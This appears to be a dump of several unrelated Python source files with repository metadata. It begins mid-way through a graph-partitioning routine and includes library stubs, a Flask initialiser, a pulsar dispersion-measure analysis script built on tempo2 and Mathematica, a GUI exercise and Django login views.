reorganize_partitions(self.partitions)
reset_partition_device(self.partitions)
get_device_to_partitions_mapping(self.partitions, self.devices)
return cost
def swap_node_to_partition(node, p0, p1, node_to_latency_mapping, transfer_rate_per_sec):
"""This function helps to swap one node from partition p0
with all the nodes in another partition p1
"""
p1_nodes = list(p1.nodes) + [None]
min_cost = float('inf')
node_pair: List[Node] = []
for n1 in p1_nodes:
# Ignore the node if it is not a op node
if n1 is not None and n1.op in {'placeholder', 'get_attr'}:
continue
# Try swapping node in p0 with n1 in p1
cost = try_swap_nodes(node, n1, p0, p1, node_to_latency_mapping, transfer_rate_per_sec)
if cost < min_cost:
node_pair = [node, n1]
min_cost = cost
return cost, node_pair
# First use size_base_partition
self.size_based_partition()
partition_to_latency_mapping = get_partition_to_latency_mapping(
self.partitions,
node_to_latency_mapping
)
# Calculate the cost of the partitions
cost = get_latency_of_partitioned_graph(
self.partitions,
partition_to_latency_mapping,
transfer_rate_bytes_per_sec
)
# Keep tracking the node pair that shows the better cost
node_pair: List[Node] = []
# Keep tracking the partition pair of node pair
partition_pair: List[Partition] = []
# Collect all the op nodes from the graph
op_nodes = []
for n in self.graph_module.graph.nodes:
if n.op not in {'placeholder', 'get_attr', 'output'}:
op_nodes.append(n)
for node in op_nodes:
# Find which partition the current node belongs
p0_index = self.node_to_partition[node]
p0 = self.partitions[p0_index]
# Go through all the other partitions to swap
# with other nodes from those partitions
for p1_index, _ in enumerate(self.partitions):
if p0_index != p1_index:
p1 = self.partitions[p1_index]
new_cost, new_node_pair = swap_node_to_partition(
node,
p0,
p1,
node_to_latency_mapping,
transfer_rate_bytes_per_sec
)
# Update cost and node pair
if new_cost < cost:
cost = new_cost
node_pair = new_node_pair
partition_pair = [p0, p1]
# Do the swapping after trying all the nodes from a partition
if len(node_pair) != 0:
swap_nodes(node_pair[0], node_pair[1], partition_pair[0], partition_pair[1])
reorganize_partitions(self.partitions)
get_device_to_partitions_mapping(self.partitions, self.devices)
reorganize_partitions(self.partitions)
# Mapping the device to the partition
get_device_to_partitions_mapping(self.partitions, self.devices)
return
def aot_based_partition(self, node_to_partition_mapping, partition_to_logical_device_mapping):
"""This function helps to rebuild the partitions given the nodes and its
corresponding partition id
"""
partition_id_to_partition_mapping: Dict[int, Partition] = {}
self.node_to_partition = node_to_partition_mapping
for node in self.node_to_partition:
partition_id = self.node_to_partition[node]
# If the requested partition has not been created, create the partition
if partition_id not in partition_id_to_partition_mapping:
partition = Partition(partition_id)
self.partitions.append(partition)
partition_id_to_partition_mapping[partition_id] = partition
partition.logical_device_ids = partition_to_logical_device_mapping[partition_id]
else:
partition = partition_id_to_partition_mapping[self.node_to_partition[node]]
# Add the current node into the partition
partition.add_node(node)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
f0d8f6c720eb71434eb0ba1ce0acdcdedf4ed128 | 2aace9bb170363e181eb7520e93def25f38dbe5c | /build/idea-sandbox/system/python_stubs/cache/2e033ce6e3a2cdde5174895cadb3b406b2a013729dd641fee2cebd9f7ed97879/cv2/videoio_registry.py | 0be5f4768f19952c2adff113bfb96d3a9ccf5394 | [] | no_license | qkpqkp/PlagCheck | 13cb66fd2b2caa2451690bb72a2634bdaa07f1e6 | d229904674a5a6e46738179c7494488ca930045e | refs/heads/master | 2023-05-28T15:06:08.723143 | 2021-06-09T05:36:34 | 2021-06-09T05:36:34 | 375,235,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,362 | py | # encoding: utf-8
# module cv2.videoio_registry
# from C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
# by generator 1.147
# no doc
# no imports
# Variables with simple values
__loader__ = None
__spec__ = None
# functions
def getBackendName(api): # real signature unknown; restored from __doc__
"""
getBackendName(api) -> retval
. @brief Returns backend API name or "UnknownVideoAPI(xxx)"
. @param api backend ID (#VideoCaptureAPIs)
"""
pass
def getBackends(): # real signature unknown; restored from __doc__
"""
getBackends() -> retval
. @brief Returns list of all available backends
"""
pass
def getCameraBackends(): # real signature unknown; restored from __doc__
"""
getCameraBackends() -> retval
. @brief Returns list of available backends which works via `cv::VideoCapture(int index)`
"""
pass
def getStreamBackends(): # real signature unknown; restored from __doc__
"""
getStreamBackends() -> retval
. @brief Returns list of available backends which works via `cv::VideoCapture(filename)`
"""
pass
def getWriterBackends(): # real signature unknown; restored from __doc__
"""
getWriterBackends() -> retval
. @brief Returns list of available backends which works via `cv::VideoWriter()`
"""
pass
# no classes
| [
"qinkunpeng2015@163.com"
] | qinkunpeng2015@163.com |
b0128b5d3d809a337ac36802f9c7f3f42460b449 | 8fd303230f4dbc5df510090a6d76b81488b4b76e | /image_service/appengine_version/__init__.py | 58ddf3ffb3c4f8c35d4301e782f7472ec60d5461 | [] | no_license | ferronrsmith/flask_projects | d1a2744b2501b26531ddbc686a4630a28ed3c514 | 4267834bf4596cf8b8a83b9ba9cbd2daa6121a72 | refs/heads/master | 2020-06-05T15:36:40.939652 | 2015-04-02T05:28:56 | 2015-04-02T05:28:56 | 3,476,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | """
Initialize Flask app
"""
from flask import Flask
app = Flask('application')
app.config.from_object('application.settings')
import views
| [
"ferronrsmith@gmail.com"
] | ferronrsmith@gmail.com |
e3ccdca5abee0a3a58f7e2e3e62e2ee554307105 | f5dc531a15084a8dfa2e955b393edb9b1141bcfc | /Python Scripts/refineddmplot.py | a1be642ed5c4e3850ae27176b6c7c87d2a89978a | [] | no_license | ggrillo93/fermi-data-analysis | 2d5c368eee67df5d24855c888642836c0a7b3163 | 11728edcdfeee3565680ce6cefa6cbc14f4d2477 | refs/heads/master | 2021-09-08T15:41:49.493281 | 2018-03-10T20:36:34 | 2018-03-10T20:36:34 | 124,696,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,783 | py | #!/usr/bin/env python
import os
import pyfits
import numpy as np
import math
from pylab import *
from matplotlib import pyplot as plt
import csv
from subprocess import call
fullpulsar=raw_input('Enter pulsar name: ')
modes=raw_input('Enter modes (Crossband, Dualband and/or Inband): ')
pulsar=fullpulsar[:5]
def fullText(text):
with open(text) as f:
lista=[]
for line in f:
lista.append(line)
return lista
def columnToList(text,colnumber):
with open(text) as f:
lista=[]
for line in f:
spl=line.split()
lista.append(spl[colnumber])
return lista
def columnToList2(ptext,colnumber):
lista=[]
for line in ptext:
spl=line.split()
lista.append(spl[colnumber])
return lista
def strToFloat(lista):
nlista=[]
for val in lista:
try:
newval=float(val)
except ValueError:
newval=0
nlista.append(newval)
return nlista
def positionLast (x,s):
count = len(s)
for i in s[::-1]:
count -= 1
if i == x:
return count
return None
def positionFirst(x,s):
count=0
for i in s:
if i==x:
return count
else:
count=count+1
return None
def formatted(lista):
dmlist=[]
for dm in lista:
newdm=''
for ch in dm:
if ch == '*':
newdm=newdm+'e'
elif ch == '^':
newdm=newdm
elif ch == '{':
newdm=newdm
elif ch ==',':
newdm=newdm
else:
newdm=newdm+ch
dmlist.append(newdm)
return dmlist
def formatted2(lista):
dmerrlist=[]
for olderr in lista:
new=olderr[:-1]
dmerrlist.append(new)
return dmerrlist
def findBeginning(tempofile):
for n in range(0,len(tempofile)):
if tempofile[n][:2]=='St':
break
return n
def epochDivider(epochloc,variable):
varepochs=[]
for pair in epochloc:
startloc=pair[0]
endloc=pair[1]
varepoch=variable[startloc:endloc+1]
varepochs.append(varepoch)
return varepochs
def setMode(mode):
mathinputdir="/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Input/"+pulsar+"/"+mode
if not os.path.exists(mathinputdir):
os.makedirs(mathinputdir)
return mathinputdir
# Run tempo2 on pulsar
os.chdir("/home/ggrillo93/Documents/Research/NANOGrav/DM/Tempo2/Original/") # tempo files location
first='tempo2 -output general2 -f '+fullpulsar+'_NANOGrav_9yv1.gls.par '+fullpulsar+'_NANOGrav_9yv1.tim '
second='-s "{freq} {pre} {bat} {err}\n" > '+pulsar+'.txt'
os.system(first+second)
os.system('mv '+pulsar+'.txt /home/ggrillo93/Documents/Research/NANOGrav/DM/"iPython NB"/Input') # location of tempo output
os.chdir("/home/ggrillo93/Documents/Research/NANOGrav/DM/iPython NB")
# Open par file
parfile="/home/ggrillo93/Documents/Research/NANOGrav/DM/Tempo2/Original/" + fullpulsar + "_NANOGrav_9yv1.gls.par"
parameters=columnToList(parfile,0)
parvalue=columnToList(parfile,1)
dmxfile=fullText('/home/ggrillo93/Documents/Research/NANOGrav/DM/Tempo2/Gamma/NNstar-F2/'+fullpulsar+'/'+fullpulsar+'.dmt')[3:]
# Locate lines containing lowest observation frequency for each epoch
dmxf1loc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:5] == 'DMXF1':
dmxf1loc.append(n)
# Locate lines containing highest observation frequency for each epoch
dmxf2loc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:5] == 'DMXF2':
dmxf2loc.append(n)
# Record lowest observation frequency for each epoch
dmxf1=[]
for loc in dmxf1loc:
dmxfval=parvalue[loc]
dmxf1.append(dmxfval)
dmxf1=strToFloat(dmxf1)
# Record highest observation frequency for each epoch
dmxf2=[]
for loc in dmxf2loc:
dmxfval=parvalue[loc]
dmxf2.append(dmxfval)
dmxf2=strToFloat(dmxf2)
# Locate epochs containing observations in one band only
diff=np.subtract(dmxf2,dmxf1)
singlebandloc=[]
for n in range(0,len(diff)):
if diff[n] < 1000:
singlebandloc.append(n)
# Locate lines containing DMX values for each epoch
dmxloc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:5] == 'DMX_0':
dmxloc.append(n)
# Record DMX value in tempo2 format
tdmx=[]
for loc in dmxloc:
dmxval=parvalue[loc]
tdmx.append(dmxval)
# Transform DMX values from par file format to Python
dmx=[]
for dmxvalue in tdmx:
newdmxvalue=''
for ch in dmxvalue:
if ch != 'D':
newdmxvalue=newdmxvalue+ch
else:
newdmxvalue=newdmxvalue+'e'
dmx.append(newdmxvalue)
dmx=strToFloat(dmx)
# Locate lines containing epoch ranges
dmxrangeloc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:4] == 'DMXR':
dmxrangeloc.append(n)
# Record ranges values for each epoch
dmxr=[]
for loc in dmxrangeloc:
day=parvalue[loc]
dmxr.append(day)
dmxr=strToFloat(dmxr)
# Rearrange ranges values in pairs
dmxranges=[]
for n in range(0,len(dmxr)-1,2):
r=[dmxr[n],dmxr[n+1]]
dmxranges.append(r)
# Assign a particular MJD to each epoch
epochdays=[]
for dmxpair in dmxranges:
av=(dmxpair[0]+dmxpair[1])/2.0
epochdays.append(av)
# Modify lists to remove data for epochs containing only single band observations
adjsbloc=[]
for n in range(0,len(singlebandloc)):
new=singlebandloc[n]-n
adjsbloc.append(new)
for loc in adjsbloc:
del epochdays[loc]
del dmxranges[loc]
del dmxf1[loc]
del dmxf2[loc]
del dmx[loc]
del dmxfile[loc]
# Analyze dmxf1 and dmxf2 to generate list of observation frequencies
f1min=min(dmxf1)
obsfreqs=[]
if f1min > 700 and f1min < 800:
f1='820 MHz'
obsfreqs.append(f1)
if f1min < 500:
f1='430 MHz'
obsfreqs.append(f1)
if f1min > 1000:
f1='1410 MHz'
obsfreqs.append(f1)
f2max=max(dmxf2)
if f2max > 1800 and f2max < 1900:
f2='1500 MHz'
obsfreqs.append(f2)
if f2max > 1700 and f2max < 1800:
f2='1410 MHz'
obsfreqs.append(f2)
if f2max > 2000:
f2='2030 MHz'
obsfreqs.append(f2)
if f1 == '430 MHz' and f2=='2030 MHz':
f2='1410 MHz'
f3='2030 MHz'
obsfreqs=[f1,f2,f3]
# Open tempo2 output and delete unnecessary lines
rawallbands="/home/ggrillo93/Documents/Research/NANOGrav/DM/iPython NB/Input/"+pulsar+".txt"
allbands=fullText(rawallbands)
beg=findBeginning(allbands)
allbands=allbands[beg+1:-2]
# Extract frequencies, residuals, TOAs, and errors from tempo2 file
freq=strToFloat(columnToList2(allbands,0))
res=strToFloat(columnToList2(allbands,1))
toas=strToFloat(columnToList2(allbands,2))
err=strToFloat(columnToList2(allbands,3))
# Sort quantities based on TOAs
l = sorted(zip(toas, freq, res, err), key=lambda x: x[0])
stoas, sfreq, sres, serr = zip(*sorted(zip(toas, freq, res, err)))
# Locate start and end days for each epoch
rtoas=np.around(stoas,1)
ftoas=np.floor(stoas)
ctoas=np.ceil(stoas)
epochloc=[]
for daypair in dmxranges:
startloc=positionFirst(np.floor(daypair[0]),ftoas)
endloc=positionLast(np.ceil(daypair[1]),ctoas)
locpair=[startloc,endloc]
epochloc.append(locpair)
faultypair=None
noneloc=None
for locpair in epochloc:
if None in locpair:
faultypair=locpair
noneloc=locpair.index(None)
if faultypair != None:
faultyloc=epochloc.index(faultypair)
if noneloc == 0:
epochloc[faultyloc][0]=epochloc[faultyloc-1][1]
elif noneloc == 1:
epochloc[faultyloc][1]=epochloc[faultyloc+1][0]
# Create list of 1/freq^2
invfreq=[]
for freq in sfreq:
new=1.0/freq**2
invfreq.append(new)
# Divide quantities by epoch
freqepochs=epochDivider(epochloc,sfreq)
invfreqepochs=epochDivider(epochloc,invfreq)
resepochs=epochDivider(epochloc,sres)
errepochs=epochDivider(epochloc,serr)
if 'crossband' in modes or 'Crossband' in modes:
# Generate crossband points
mathinputdir=setMode('crossband')
mode='crossband'
# Write quantities to files
data=[invfreqepochs,resepochs,errepochs]
n = 0
for y in range(0,len(invfreqepochs)):
if n < 10:
with open(mathinputdir+"/epoch" + str(0) + str(n) +".txt", "w") as f:
varlist = []
for x in range(0,3):
var = data[x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
else:
with open(mathinputdir+"/epoch" + str(n) +".txt", "w") as f:
varlist = []
for x in range(0,3):
var = data[x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
path='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar
if not os.path.exists(path):
os.makedirs('/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar)
# Write Mathematica script
line1='files' + '= FileNames["*.txt",'+'"'+mathinputdir+'"'+'];'
line2='data = Import[#, "Data"] & /@ files;'
line3='m = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+'.txt"];'
line4='Do[epoch = data[[i]];'
line5='freq = epoch[[All, 1]];'
line6='res = epoch[[All, 2]];'
line7='err = epoch[[All, 3]]*10^-6;'
line8='data1 = Transpose@{freq, res};'
line9='fit = LinearModelFit[data1, x, x, Weights -> 1/err^2,VarianceEstimatorFunction -> (1 &)];'
line10='fit2 = Normal[LinearModelFit[data1, x, x, Weights -> 1/err^2,VarianceEstimatorFunction -> (1 &)]];'
line11='f = 0.000241022;'
line12='t = Expand[f*fit2];'
line13='error = f*fit["ParameterErrors"];'
line14='error2 = Last[error];'
line15='Write[m, {D[t, x]*-1, error2}], {i,'+str(len(epochdays))+'}];'
line16='Close[m]'
lines=[]
for n in range(1,17):
line=eval('line'+str(n))
lines.append(line)
with open(mathinputdir+"/temp.txt", "w") as f:
for item in lines:
f.write("%s\n" % item)
# Run Mathematica script
os.chdir(mathinputdir)
call(['math','-script','temp.txt'])
if 'dualband' in modes or 'Dualband' in modes or 'inband' in modes or 'Inband' in modes: # Need this for dualband and inband
# Determine location of frequency bands
freqloc=[]
for epoch in freqepochs:
f1=[]
f2=[]
f3=[]
for n in range(len(epoch)):
f=epoch[n]
if obsfreqs==['820 MHz','1500 MHz']:
if f < 1000:
f1.append(n)
else:
f2.append(n)
if obsfreqs==['430 MHz','1410 MHz']:
if f < 800:
f1.append(n)
else:
f2.append(n)
if obsfreqs==['1410 MHz','2030 MHz']:
if f < 1761:
f1.append(n)
else:
f2.append(n)
if len(obsfreqs)==3:
if f < 800:
f1.append(n)
elif f < 1761:
f2.append(n)
else:
f3.append(n)
if len(obsfreqs)==3:
epochfreqloc=[f1,f2,f3]
else:
epochfreqloc=[f1,f2]
freqloc.append(epochfreqloc)
# Arrange data based on frequency bands
data=[freqepochs,resepochs,errepochs]
newdata=[]
for d in data:
newdataepochs=[]
for n in range(len(d)):
epoch=d[n]
locepoch=freqloc[n]
newepoch=[]
for i in locepoch:
flist=[]
for s in i:
f=epoch[s]
flist.append(f)
newepoch.append(flist)
newdataepochs.append(newepoch)
newdata.append(newdataepochs)
if 'dualband' in modes or 'Dualband' in modes:
# Generate dual band/triple band points
mathinputdir=setMode('dualband')
mode='dualband'
# Average data
dataav=[]
for d in newdata:
dav=[]
for epoch in d:
epochav=[]
for values in epoch:
av=np.mean(values)
epochav.append(av)
dav.append(epochav)
dataav.append(dav)
# Calculate 1/freq^2
freqav=dataav[0]
invfreqav=[]
for epoch in freqav:
newepoch=[]
for freq in epoch:
invfreq=1.0/freq**2
newepoch.append(invfreq)
invfreqav.append(newepoch)
dataav[0]=invfreqav
# Create columns
columns=[]
for x in range(3):
for z in range(len(obsfreqs)):
column=[]
for y in range(len(epochdays)):
value=dataav[x][y][z]
column.append(value)
columns.append(column)
# Write columns to file
os.chdir("/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Input/"+pulsar+"/dualband/")
with open("dualband.csv", "wb") as f:
writer = csv.writer(f)
writer.writerows(columns)
f.close()
# Write Mathematica script for 3 band pulsar
if len(epochfreqloc)==3:
line1= 'data = Import['+'"'+mathinputdir+'/dualband.csv", "Data"];'
line2= 's = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+'.txt"];'
line3= 'f1avlist = data[[1]];'
line4= 'f2avlist = data[[2]];'
line5= 'f3avlist = data[[3]];'
line6= 'f1reslist = data[[4]];'
line7= 'f2reslist = data[[5]];'
line8= 'f3reslist = data[[6]];'
line9= 'f1errlist = data[[7]]*10^-6;'
line10= 'f2errlist = data[[8]]*10^-6;'
line11= 'f3errlist = data[[9]]*10^-6;'
line12= 'Do[f1av = f1avlist[[i]];'
line13= 'f2av = f2avlist[[i]];'
line14= 'f3av = f3avlist[[i]];'
line15= 'f1res = f1reslist[[i]];'
line16= 'f2res = f2reslist[[i]];'
line17= 'f3res = f3reslist[[i]];'
line18= 'f1err = f1errlist[[i]];'
line19= 'f2err = f2errlist[[i]];'
line20= 'f3err = f3errlist[[i]];'
line21= 'k = {{{f2av, f2res}, {f3av, f3res}}, {f2err, f3err}};'
line22= 'y = {{{f1av, f1res}, {f2av, f2res}}, {f1err, f2err}};'
line23= 'z = {{{f1av, f1res}, {f2av, f2res}, {f3av, f3res}}, {f1err, f2err, f3err}};'
line24= 'a = Which[f1av === "nan", k, f3av === "nan", y, f1av =!= "nan" && f3av =!= "nan", z];'
line25= 'data2 = a[[1]]; err = a[[2]];'
line26= 'fit = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] // Normal;'
line27= 'fit2 = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] ;'
line28= 'f = 0.000241022;'
line29= 't = Expand[f*fit];'
line30= 'der = D[t, x];'
line31= 'error = Last[fit2["ParameterErrors"]];'
line32= 'adjerr = error*f;'
line33= 'Write[s, {der*-1, adjerr}], {i,'+str(len(epochdays))+'}];'
line34= 'Close[s]'
lines=[]
for n in range(1,35):
line=eval('line'+str(n))
lines.append(line)
# Write Mathematica script for 2 band pulsar
if len(epochfreqloc)==2:
line1= 'data = Import['+'"'+mathinputdir+'/dualband.csv", "Data"];'
line2= 's = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+'.txt"];'
line3= 'f1avlist = data[[1]];'
line4= 'f2avlist = data[[2]];'
line5= 'f1reslist = data[[3]];'
line6= 'f2reslist = data[[4]];'
line7= 'f1errlist = data[[5]]*10^-6;'
line8= 'f2errlist = data[[6]]*10^-6;'
line9= 'Do[f1av = f1avlist[[i]];'
line10= 'f2av = f2avlist[[i]];'
line11= 'f1res = f1reslist[[i]];'
line12= 'f2res = f2reslist[[i]];'
line13= 'f1err = f1errlist[[i]];'
line14= 'f2err = f2errlist[[i]];'
line15= 'data2 = {{f1av,f1res},{f2av,f2res}}; err = {f1err,f2err};'
line16= 'fit = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] // Normal;'
line17= 'fit2 = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] ;'
line18= 'f = 0.000241022;'
line19= 't = Expand[f*fit];'
line20= 'der = D[t, x];'
line21= 'error = Last[fit2["ParameterErrors"]];'
line22= 'adjerr = error*f;'
line23= 'Write[s, {der*-1, adjerr}], {i,'+str(len(epochdays))+'}];'
line24= 'Close[s]'
lines=[]
for n in range(1,25):
line=eval('line'+str(n))
lines.append(line)
with open(mathinputdir+"/temp.txt", "w") as f:
for item in lines:
f.write("%s\n" % item)
# Run Mathematica script
os.chdir(mathinputdir)
call(['math','-script','temp.txt'])
os.system('rm temp.txt')
if 'inband' in modes or 'Inband' in modes:
# Generate inband data points
mathinputdir=setMode('inband')
mode='inband'
# Rearrange quantities based on epoch
flist = []
for h in range(len(obsfreqs)):
fnlist=[]
for n in range(len(epochdays)):
fepoch=[]
for i in range(len(newdata)):
f=newdata[i][n][h]
fepoch.append(f)
fnlist.append(fepoch)
flist.append(fnlist)
# Create list of available bands
bands=[]
for n in range(1,len(flist)+1):
f='f'+str(n)
bands.append(f)
# Create directory for each band
for s in range(len(bands)):
band=bands[s]
if not os.path.exists(mathinputdir+'/'+band):
os.makedirs(mathinputdir+'/'+band)
# Write data to files
n = 0
for x in range(0,len(epochdays)):
if n < 10:
with open(mathinputdir+'/'+band+"/epoch" + str(0) + str(n) +".txt", "w") as f:
varlist = []
for y in range(0,3):
var = flist[s][x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
else:
with open(mathinputdir+'/'+band+"/epoch" + str(n) +".txt", "w") as f:
varlist = []
for y in range(0,3):
var = flist[s][x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
# Write Mathematica script
line1= 'files = FileNames["*.txt", "'+mathinputdir+'/'+band+'"];'
line2= 'data = Import[#, "Data"] & /@ files;'
line3= 'm = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+band+'.txt"];'
line4= 'Do[epoch = data[[i]];'
line5= 'freq = 1/epoch[[All, 1]]^2;'
line6= 'res = epoch[[All, 2]];'
line7= 'err = epoch[[All, 3]]*10^-6;'
line8= 'data1 = Transpose@{freq, res};'
line9= 'fit = LinearModelFit[data1, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)];'
line10= 'fit2 = Normal[LinearModelFit[data1, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)]];'
line11= 'f = 0.000241022;'
line12= 't = Expand[f*fit2];'
line13= 'error = f*fit["ParameterErrors"];'
line14= 'error2 = Last[error];'
line15= 'Write[m, {D[t, x]*-1, error2}], {i,'+str(len(epochdays))+'}];'
line16= 'Close[m]'
lines=[]
for n in range(1,17):
line=eval('line'+str(n))
lines.append(line)
with open(mathinputdir+"/temp"+band+".txt", "w") as f:
for item in lines:
f.write("%s\n" % item)
os.chdir(mathinputdir)
call(['math','-script','temp'+band+'.txt']) # Run Mathematica script
os.system('rm temp'+band+' .txt') # Remove temporary file
# Create plotting lists
mathout=[]
legends=[]
colors=[]
if 'crossband' in modes or 'Crossband' in modes:
cb='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/crossband.txt'
mathout.append(cb)
legends.append('Crossband DM')
colors.append('blue')
if 'dualband' in modes or 'Dualband' in modes:
db='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/dualband.txt'
mathout.append(db)
legends.append('Dualband DM')
colors.append('red')
if 'inband' in modes or 'Inband' in modes:
ib1='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/inbandf1.txt'
mathout.append(ib1)
legends.append('Inband DM #1 '+ obsfreqs[0])
colors.append('green')
ib2='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/inbandf2.txt'
mathout.append(ib2)
legends.append('Inband DM #2 '+ obsfreqs[1])
colors.append('orange')
if len(obsfreqs)==3:
ib3='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/inbandf3.txt'
mathout.append(ib3)
legends.append('Inband DM #3 '+ obsfreqs[2])
colors.append('grey')
# Fix errors in Mathematica output files
newout=[]
for out in mathout:
text=fullText(out)
badlines=[]
for line in text:
if not line.startswith('{'):
badlines.append(line)
for bline in badlines:
text.remove(bline)
for n in range(len(text)):
line=text[n]
if line.startswith('{-0.000241022*('):
text[n]='{1000, 0}\n'
newout.append(text)
olddm=[]
for out in newout:
new=columnToList2(out,0)
olddm.append(new)
newdm=[]
for dmlist in olddm:
new=strToFloat(formatted(dmlist))
newdm.append(new)
olddmerr=[]
for out in newout:
new=columnToList2(out,1)
olddmerr.append(new)
newdmerr=[]
for dmerr in olddmerr:
new=strToFloat(formatted(formatted2(dmerr)))
newdmerr.append(new)
dmxerr=np.multiply(strToFloat(columnToList2(dmxfile,2)),1000)
for n in range(0,len(mathout)):
y=np.multiply(1000,newdm[n])
err=np.multiply(1000,newdmerr[n])
plt.errorbar(epochdays,y,xerr=0,yerr=err,fmt='none',ecolor=colors[n])
plt.scatter(epochdays,y,color=colors[n], label=legends[n],marker='.')
dmxp=np.multiply(1000,np.mean(dmx)-dmx)
plt.errorbar(epochdays,dmxp, xerr=0, yerr=dmxerr, fmt='none',ecolor='purple')
plt.scatter(epochdays,dmxp,color='purple',marker='.',label=r'$\overline{DMX}$'+' - DMX')
plt.legend(fontsize=10,loc=1)
plt.title(fullpulsar+ " " +r'$\Delta$'+"DM vs Date of Obs")
plt.xlabel("Day (MJD)")
plt.ylabel(r'$\Delta$'+"DM ($pc$ $cm^{-3}$)"+"x1000")
plt.xlim(epochdays[0]-50,epochdays[-1]+50)
if modes=='Crossband':
plt.ylim(min(dmxp)-.5,max(dmxp)+.5)
else:
plt.ylim(min(dmxp)-1,max(dmxp)+1)
plt.minorticks_on
show() | [
"ggrillo93@gmail.com"
] | ggrillo93@gmail.com |
be7023cfd8e20ca8aa5c7262dc094051426d8610 | 2aace9bb170363e181eb7520e93def25f38dbe5c | /build/idea-sandbox/system/python_stubs/cache/935e39a6b43731383c8ecd4f86063224edc819ebd6d95bfabab328fca05f4912/cython_runtime.py | 37c3804fcd8cb40135e6b055396f17c83e3f5186 | [] | no_license | qkpqkp/PlagCheck | 13cb66fd2b2caa2451690bb72a2634bdaa07f1e6 | d229904674a5a6e46738179c7494488ca930045e | refs/heads/master | 2023-05-28T15:06:08.723143 | 2021-06-09T05:36:34 | 2021-06-09T05:36:34 | 375,235,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # encoding: utf-8
# module cython_runtime
# from C:\Users\Doly\Anaconda3\lib\site-packages\scipy\special\_ellip_harm_2.cp37-win_amd64.pyd
# by generator 1.147
# no doc
# no imports
# Variables with simple values
__loader__ = None
__spec__ = None
# no functions
# no classes
| [
"qinkunpeng2015@163.com"
] | qinkunpeng2015@163.com |
8f0eee98f1cd65697147e3212963288dfcc6e789 | 9a32e96b5acdbed92b5a2b6eb556b9c92c0764fa | /exercises/exercise 5b.py | 5bcfb610bb022d839ccf050d46fef253e35ae892 | [] | no_license | emailman/Simulator_3 | 40d3374a7b70e46d56a7f8a5fd4b028e86acf168 | 5aa42297d9ee533ac1eb79214b2055ee4762a641 | refs/heads/master | 2020-09-22T05:30:25.518192 | 2020-02-15T16:00:43 | 2020-02-15T16:00:43 | 225,067,717 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | from exercises.simulator import GuiApp
class MyUserApp(GuiApp):
ALL_LIGHTS = ['red', 'yellow', 'green', 'blue']
def once(self):
# Set things up here to run once
self.change_title('Turn on the light corresponding to the button clicked')
self.change_message('By Eric')
def loop(self):
# Set things up here to run repeatedly
pass
def pb_clicked(self, number):
self.change_message('Button ' + str(number) + ' was clicked')
self.set_light_state(self.ALL_LIGHTS[number - 1], 'on')
# Start the simulator
MyUserApp().run()
| [
"emailman@dtcc.edu"
] | emailman@dtcc.edu |
8c2b4fefc56bf8e29cff3454b03aa8d303777d83 | c5a7d354d9282ed0b37cbf5f990a84a3d5a64436 | /web-src/accounts/views.py | 6eb5e1eb145ff49f5f168fd2827fa20f4a265c1b | [] | no_license | harshwall/Notebook | 5bb13b50d3314db417b19c99ca73ff778d3b9d92 | 23089a3bc6d4db2c21102b01c841c293dceb92ef | refs/heads/master | 2020-04-18T02:10:08.143243 | 2019-01-20T20:10:57 | 2019-01-20T20:10:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,285 | py | from django.shortcuts import render, redirect
from django.views.generic import TemplateView, View
from django.contrib.auth import authenticate, login, logout, get_user_model
from django.utils.html import strip_tags
from django.contrib import messages
from django.core.validators import validate_email
from django.shortcuts import get_object_or_404
class HomeView(TemplateView):
def get(self, request):
context = {'title': 'home'}
return render(request, 'index.html', context=context)
class LoginView(View):
def get(self, request):
return redirect('home')
def post(self, request):
if request.method == 'POST':
username = strip_tags(request.POST.get('username'))
password = strip_tags(request.POST.get('password'))
user = authenticate(username=username, password=password)
